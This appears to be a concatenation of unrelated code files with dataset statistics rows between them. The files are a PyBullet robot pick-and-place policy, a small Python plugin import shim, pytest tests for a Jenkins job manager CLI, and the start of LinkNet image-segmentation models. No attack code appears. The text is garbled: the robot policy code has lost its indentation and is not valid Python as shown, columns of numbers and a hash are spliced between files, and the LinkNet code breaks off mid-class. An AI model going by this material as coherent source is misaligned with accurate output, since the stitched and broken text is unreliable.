gripper_target_threshold = 0.03
done = False
if self.place_attempted:
# Avoid pick and place the object again after one attempt
action_xyz = [0., 0., 0.]
action_angles = [0., 0., 0.]
action_gripper = [0.]
elif object_gripper_dist > self.dist_thresh and self.env.is_gripper_open:
# move near the object
action_xyz = (object_pos - ee_pos) * self.xyz_action_scale
xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
if xy_diff > 0.03:
action_xyz[2] = 0.0
action_angles = [0., 0., 0.]
action_gripper = [0.0]
elif self.env.is_gripper_open:
# near the object enough, performs grasping action
action_xyz = (object_pos - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [-0.7]
elif not object_lifted:
# lifting objects above the height threshold for picking
action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
elif gripper_target_dist > gripper_target_threshold:
# lifted, now need to move towards the container
action_xyz = (target_pos - ee_pos) * self.xyz_action_scale
action_angles = [0., 0., 0.]
action_gripper = [0.]
else:
# already moved above the container; drop object
action_xyz = (0., 0., 0.)
action_angles = [0., 0., 0.]
action_gripper = [0.7]
self.place_attempted = True
agent_info = dict(place_attempted=self.place_attempted, done=done)
action = np.concatenate((action_xyz, action_angles, action_gripper))
return action, agent_info
class PickPlaceTarget:
def __init__(self, env, pick_height_thresh=-0.31, xyz_action_scale=7.0,
pick_point_noise=0.00, drop_point_noise=0.00,
return_origin_thresh=0.1,
angle_action_scale = 0.1,
object_target = 'container',
object_name='shed'):
self.env = env
self.pick_height_thresh_noisy = (
pick_height_thresh + np.random.normal(scale=0.01))
self.xyz_action_scale = xyz_action_scale
self.angle_action_scale = angle_action_scale
self.pick_point_noise = pick_point_noise
self.drop_point_noise = drop_point_noise
self.done = False
self.place_attempted = False
self.object_name = object_name
self.object_target = object_target
if self.object_target == 'container':
self.drop_point = self.env.container_position
elif self.object_target == 'tray':
self.drop_point = self.env.tray_position
elif self.object_target == 'drawer_top':
self.drop_point = list(self.env.top_drawer_position)
elif self.object_target == 'drawer_inside':
self.drop_point = list(self.env.inside_drawer_position)
elif self.object_target == 'trashcan':
self.drop_point = list(self.env.trashcan_position)
else:
raise NotImplementedError
self.return_origin_thresh = return_origin_thresh
self.reset()
def reset(self, object_target='container', object_name='shed'):
# self.dist_thresh = 0.06 + np.random.normal(scale=0.01)
self.object_target = object_target
self.object_name = object_name
self.object_to_target = self.object_name
self.pick_point = bullet.get_object_position(
self.env.objects[self.object_to_target])[0]
if self.object_to_target in GRASP_OFFSETS.keys():
self.pick_point += np.asarray(GRASP_OFFSETS[self.object_to_target])
self.pick_point[2] = -0.34
# self.pick_point[0] += 0.005
if object_name == 'shed':
self.pick_point[0] += 0.01
# self.drop_point = self.env.container_position
if self.object_target == 'container':
self.drop_point = list(self.env.container_position)
elif self.object_target == 'tray':
self.drop_point = list(self.env.tray_position)
elif self.object_target == 'drawer_top':
self.drop_point = list(self.env.top_drawer_position)
elif self.object_target == 'drawer_inside':
self.drop_point = list(self.env.inside_drawer_position)
elif self.object_target == 'trashcan':
self.drop_point = list(self.env.trashcan_position)
else:
raise NotImplementedError
self.drop_point[2] = -0.15
self.pick_angle = [90.0, 0.0, 0.0]
self.drop_angle = [90.0, 0.0, 0.0]
self.place_attempted = False
self.done = False
def get_action(self):
ee_pos, ee_orientation = bullet.get_link_state(
self.env.robot_id, self.env.end_effector_index)
ee_deg = bullet.quat_to_deg(ee_orientation)
# print(f"ee_pos: {ee_pos}, ee_deg: {ee_deg}")
object_pos, _ = bullet.get_object_position(
self.env.objects[self.object_to_target])
# alpha_pick = alpha_between_vec(ee_pos[0:2] - self.env.base_position[0:2],
# self.pick_point[0:2] - self.env.base_position[0:2])
# alpha_drop = alpha_between_vec(ee_pos[0:2] - self.env.base_position[0:2],
# self.drop_point[0:2] - self.env.base_position[0:2])
object_lifted = object_pos[2] > self.pick_height_thresh_noisy
# gripper_pickpoint_dist = np.linalg.norm((self.pick_point - ee_pos)[:1] + (self.pick_point - ee_pos)[2:])
gripper_pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
gripper_droppoint_dist = np.linalg.norm((self.drop_point - ee_pos)[:2])
gripper_drop_point_dist_z = (self.drop_point - ee_pos)[2]
origin_dist = self.env.ee_pos_init - ee_pos
pickpoint_dist = np.linalg.norm(self.pick_point - ee_pos)
droppoint_dist = np.linalg.norm(self.drop_point - ee_pos)
# print(f"ee_pos: {ee_pos}, pick_point: {self.pick_point}, drop_point: {self.drop_point}")
done = False
# print(origin_dist, np.linalg.norm(origin_dist))
noise = True
noise_thresh = 0.015
if self.place_attempted:
# Avoid pick and place the object again after one attempt
# first lift arm keep xy unchanged
if np.abs(gripper_drop_point_dist_z) < 0.01:
# print("lifted")
action_xyz = [0., 0., gripper_drop_point_dist_z * self.xyz_action_scale]
action_angles = (self.drop_angle - ee_deg) * self.angle_action_scale
action_gripper = [0.0]
else:
action_xyz = [0., 0., 0.]
action_angles = [0., 0., 0.]
action_gripper = [0.]
done = True
self.done = done
elif gripper_pickpoint_dist > 0.015 and self.env.is_gripper_open:
# print("move near the object")
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
# print(f"distance: {self.pick_point - ee_pos}, ee_pos: {ee_pos}, abs: {pickpoint_dist} ")
# if pickpoint_dist > noise_thresh:
# noise = True
xy_diff = np.linalg.norm(action_xyz[:2] / self.xyz_action_scale)
if xy_diff > 0.03:
action_xyz[2] = 0.0
# action_angles = [0., 0., 0.]
action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
action_gripper = [0.0]
elif self.env.is_gripper_open:
# print("near the object enough, performs grasping action")
noise = False
action_xyz = (self.pick_point - ee_pos) * self.xyz_action_scale
# action_angles = [0., 0., 0.]
action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
action_gripper = [-0.9]
elif not object_lifted:
# print("lifting objects above the height threshold for picking")
action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
# action_angles = [0., 0., 0.]
action_angles = (self.pick_angle - ee_deg) * self.angle_action_scale
action_gripper = [0.]
elif gripper_droppoint_dist > 0.02:
if droppoint_dist < noise_thresh:
noise = False
# print("lifted, now need to move towards the container")
# print(f"distance: {self.drop_point - ee_pos}, ee_pos: {ee_pos}, abs: {droppoint_dist}")
action_xyz = (self.drop_point - ee_pos) * self.xyz_action_scale
# action_angles = [0., 0., 0.]
action_angles = (self.drop_angle - ee_deg) * self.angle_action_scale
action_gripper = [0.]
else:
# print("already moved above the container; drop object")
action_xyz = (0., 0., 0.)
action_angles = [0., 0., 0.]
action_gripper = [0.9]
self.place_attempted = True
# import pdb; pdb.set_trace()
# print(f"ee_pos: {ee_pos}, ee_deg: {ee_deg}, action_angles: {action_angles}")
# if done and self.place_attempted:
# if np.linalg.norm(ee_pos - self.env.ee_pos_init) < self.return_origin_thresh:
# self.done = done
# else:
# action_xyz = (self.env.ee_pos_init - ee_pos) * self.xyz_action_scale
# # print(ee_pos, self.env.ee_pos_init)
# # print(np.linalg.norm(ee_pos - self.env.ee_pos_init))
agent_info = dict(place_attempted=self.place_attempted, done=self.done)
neutral_action = [0.]
action = np.concatenate(
(action_xyz, action_angles, action_gripper, neutral_action))
# import pdb; pdb.set_trace()
return action, agent_info, noise
| 43.719258
| 114
| 0.607706
| 2,481
| 18,843
| 4.314792
| 0.069327
| 0.016441
| 0.010929
| 0.026903
| 0.819804
| 0.781784
| 0.761046
| 0.72639
| 0.705465
| 0.686035
| 0
| 0.027227
| 0.290506
| 18,843
| 431
| 115
| 43.719258
| 0.773506
| 0.146049
| 0
| 0.716511
| 0
| 0
| 0.00761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040498
| false
| 0
| 0.015576
| 0
| 0.084112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
76d4b562f2fe0252248379b5446096abc8804a16
| 147
|
py
|
Python
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 113
|
2020-02-25T03:19:32.000Z
|
2021-05-17T09:15:40.000Z
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 172
|
2020-02-21T08:56:42.000Z
|
2021-05-12T03:18:40.000Z
|
tools/console/plugins/plugin_compile/__init__.py
|
rh101/engine-x
|
17ad9829dd410c689857760b6ece89d99e877a95
|
[
"MIT"
] | 62
|
2020-02-23T14:10:16.000Z
|
2021-05-14T13:53:19.000Z
|
import sys
if(sys.version_info.major >= 3):
from .project_compile import CCPluginCompile
else:
from project_compile import CCPluginCompile
| 24.5
| 48
| 0.789116
| 19
| 147
| 5.947368
| 0.631579
| 0.19469
| 0.318584
| 0.424779
| 0.690265
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.14966
| 147
| 5
| 49
| 29.4
| 0.896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76e7bf2bdbb2617003de566acb459a4b7acea237
| 12,573
|
py
|
Python
|
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
tests/test_jenkins_job_manager.py
|
erilyz/jenkins-job-manager
|
550227f5d4e1932bdd5a12ead2907a26289ea174
|
[
"Apache-2.0"
] | null | null | null |
from functools import partial
import logging
import os
import pytest
from unittest import mock
import click.testing
import tomlkit
from jenkins_job_manager import __version__
from jenkins_job_manager.cli import jjm
HERE = os.path.dirname(os.path.realpath(__file__))
PROJECT_DIR = os.path.realpath(HERE + "/../")
def test_version():
with open(f"{PROJECT_DIR}/pyproject.toml") as fp:
doc = tomlkit.parse(fp.read())
print(doc)
toml_version = doc["tool"]["poetry"]["version"]
assert __version__ == toml_version
@pytest.fixture
def jjm_runner():
runner = click.testing.CliRunner()
return partial(runner.invoke, jjm)
base_args = [
"-d",
"-C",
"/tmp",
"--url",
"https://yourjenkinsurl.com/",
]
overrides_url = {"url": "https://yourjenkinsurl.com/"}
overrides_none = {}
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner()
assert result.exit_code == 0
assert "Usage:" in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_not_called()
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_not_called()
handle_validation_errors.assert_not_called()
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_all_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(base_args)
assert result.exit_code == 2
assert "Usage:" in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_not_called()
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_not_called()
handle_validation_errors.assert_not_called()
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_apply_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(["apply"])
assert result.exit_code == 1
assert "ERROR" not in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_called_once_with(overrides_none)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_apply_all_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(base_args + ["apply"] + ["--target", "bogus"])
assert result.exit_code == 1
assert "ERROR" not in result.output
log.setLevel.assert_called_once_with(logging.DEBUG)
JenkinsJobManager.assert_called_once_with(overrides_url)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_check_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(["check"])
assert result.exit_code == 0
assert "ERROR" not in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_called_with(overrides_none)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_not_called()
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_check_all_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(base_args + ["check", "--load-plugins"])
assert result.exit_code == 0
assert "ERROR" not in result.output
log.setLevel.assert_called_once_with(logging.DEBUG)
JenkinsJobManager.assert_called_once_with(overrides_url)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_not_called()
handle_plan_report.assert_not_called()
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_import_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(["import"])
assert result.exit_code == 0
assert "ERROR" not in result.output
assert "Imported 0 jobs." in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_called_once_with(overrides_none)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_not_called()
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_import_all_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(base_args + ["import"] + ["--target", "bogus"])
assert result.exit_code == 0
assert "ERROR" not in result.output
assert "Imported 0 jobs." in result.output
log.setLevel.assert_called_once_with(logging.DEBUG)
JenkinsJobManager.assert_called_once_with(overrides_url)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_not_called()
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_login_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(["login"])
assert result.exit_code == 1
assert "ERROR" not in result.output
assert "Auth already configured for this jenkins" in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_called_once_with(overrides_none)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_not_called()
handle_validation_errors.assert_not_called()
handle_plan_report.assert_not_called()
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_plan_no_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
result = jjm_runner(["plan"])
assert result.exit_code == 0
assert "ERROR" not in result.output
log.setLevel.assert_not_called()
JenkinsJobManager.assert_called_once_with(overrides_none)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=True)
@mock.patch("jenkins_job_manager.cli.log", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_plan_report", autospec=True)
@mock.patch("jenkins_job_manager.cli.handle_validation_errors", autospec=True)
@mock.patch("jenkins_job_manager.cli.check_auth", autospec=True)
@mock.patch("jenkins_job_manager.cli.jjm_check", autospec=True)
@mock.patch("jenkins_job_manager.cli.JenkinsJobManager", autospec=True)
def test_jjm_plan_all_args(
JenkinsJobManager,
jjm_check,
check_auth,
handle_validation_errors,
handle_plan_report,
log,
jjm_runner,
):
plan_args = ["--skip-pager", "--target", "bogus"]
result = jjm_runner(base_args + ["plan"] + plan_args)
assert result.exit_code == 0
assert "Usage" not in result.output
log.setLevel.assert_called_once_with(logging.DEBUG)
JenkinsJobManager.assert_called_once_with(overrides_url)
JenkinsJobManager.gather.assert_not_called()
jjm_check.assert_not_called()
check_auth.assert_called_once_with(JenkinsJobManager())
handle_validation_errors.assert_called_once_with(JenkinsJobManager())
handle_plan_report.assert_called_once_with(JenkinsJobManager(), use_pager=False)
| 36.979412
| 84
| 0.777539
| 1,671
| 12,573
| 5.472172
| 0.06164
| 0.074366
| 0.126422
| 0.146544
| 0.933836
| 0.92126
| 0.918854
| 0.911964
| 0.911964
| 0.910871
| 0
| 0.001165
| 0.112781
| 12,573
| 339
| 85
| 37.088496
| 0.818557
| 0
| 0
| 0.812298
| 0
| 0
| 0.225324
| 0.199077
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.042071
| false
| 0
| 0.048544
| 0
| 0.093851
| 0.003236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a08f166d76bf6367eb20f683b5fd76b0e63fbb0
| 44,166
|
py
|
Python
|
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | 2
|
2020-11-28T07:56:09.000Z
|
2021-11-08T09:30:39.000Z
|
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | null | null | null |
pywick/models/segmentation/mnas_linknets/linknet.py
|
ashishpatel26/pywick
|
1afffd1c21c2b188836d3599e802146182757bb5
|
[
"MIT"
] | null | null | null |
# Source: https://github.com/snakers4/mnasnet-pytorch/blob/master/src/models/linknet.py
"""
Implementation of `LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation <https://arxiv.org/abs/1707.03718>`_
"""
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
from .resnext import resnext101_32x4d
from .inception_resnet import inceptionresnetv2
from .inception4 import inceptionv4
from .decoder import DecoderBlockLinkNetV2 as DecoderBlock
from .decoder import DecoderBlockLinkNetInceptionV2 as DecoderBlockInception
__all__ = ['LinkCeption', 'LinkDenseNet121', 'LinkDenseNet161', 'LinkInceptionResNet', 'LinkNet18', 'LinkNet34', 'LinkNet50', 'LinkNet101', 'LinkNet152', 'LinkNeXt', 'CoarseLinkNet50']
nonlinearity = nn.ReLU
class BasicConv2d(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size, stride, padding=0):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes,
kernel_size=kernel_size, stride=stride,
padding=padding, bias=False) # verify bias false
self.bn = nn.BatchNorm2d(out_planes,
eps=0.001, # value found in tensorflow
momentum=0.1, # default pytorch value
affine=True)
self.relu = nn.ReLU(inplace=False)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class LinkNet18(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [64, 128, 256, 512]
resnet = models.resnet18(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkNet34(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [64, 128, 256, 512]
resnet = models.resnet34(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
self.encoder1 = resnet.layer1
self.encoder2 = resnet.layer2
self.encoder3 = resnet.layer3
self.encoder4 = resnet.layer4
# Decoder
self.decoder4 = DecoderBlock(in_channels=filters[3],
n_filters=filters[2],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder3 = DecoderBlock(in_channels=filters[2],
n_filters=filters[1],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder2 = DecoderBlock(in_channels=filters[1],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
self.decoder1 = DecoderBlock(in_channels=filters[0],
n_filters=filters[0],
kernel_size=decoder_kernel_size,
is_deconv=is_deconv)
# Final Classifier
self.finaldeconv1 = nn.ConvTranspose2d(filters[0], 32, 3, stride=2)
self.finalrelu1 = nonlinearity(inplace=True)
self.finalconv2 = nn.Conv2d(32, 32, 3)
self.finalrelu2 = nonlinearity(inplace=True)
self.finalconv3 = nn.Conv2d(32, num_classes, 2, padding=1)
def freeze(self):
self.require_encoder_grad(False)
def unfreeze(self):
self.require_encoder_grad(True)
def require_encoder_grad(self, requires_grad):
blocks = [self.firstconv,
self.encoder1,
self.encoder2,
self.encoder3,
self.encoder4]
for block in blocks:
for p in block.parameters():
p.requires_grad = requires_grad
# noinspection PyCallingNonCallable
def forward(self, x):
# Encoder
x = self.firstconv(x)
x = self.firstbn(x)
x = self.firstrelu(x)
x = self.firstmaxpool(x)
e1 = self.encoder1(x)
e2 = self.encoder2(e1)
e3 = self.encoder3(e2)
e4 = self.encoder4(e3)
# Decoder with Skip Connections
d4 = self.decoder4(e4) + e3
d3 = self.decoder3(d4) + e2
d2 = self.decoder2(d3) + e1
d1 = self.decoder1(d2)
# Final Classification
f1 = self.finaldeconv1(d1)
f2 = self.finalrelu1(f1)
f3 = self.finalconv2(f2)
f4 = self.finalrelu2(f3)
f5 = self.finalconv3(f4)
return f5
class LinkNet50(nn.Module):
def __init__(self,
num_classes,
pretrained=True,
num_channels=3,
is_deconv=False,
decoder_kernel_size=4,
**kwargs
):
super().__init__()
filters = [256, 512, 1024, 2048]
resnet = models.resnet50(pretrained=pretrained)
self.mean = (0.485, 0.456, 0.406)
self.std = (0.229, 0.224, 0.225)
# self.firstconv = resnet.conv1
# assert num_channels == 3, "num channels not used now. to use changle first conv layer to support num channels other then 3"
# try to use 8-channels as first input
if num_channels == 3:
self.firstconv = resnet.conv1
else:
self.firstconv = nn.Conv2d(num_channels, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
self.firstbn = resnet.bn1
self.firstrelu = resnet.relu
self.firstmaxpool = resnet.maxpool
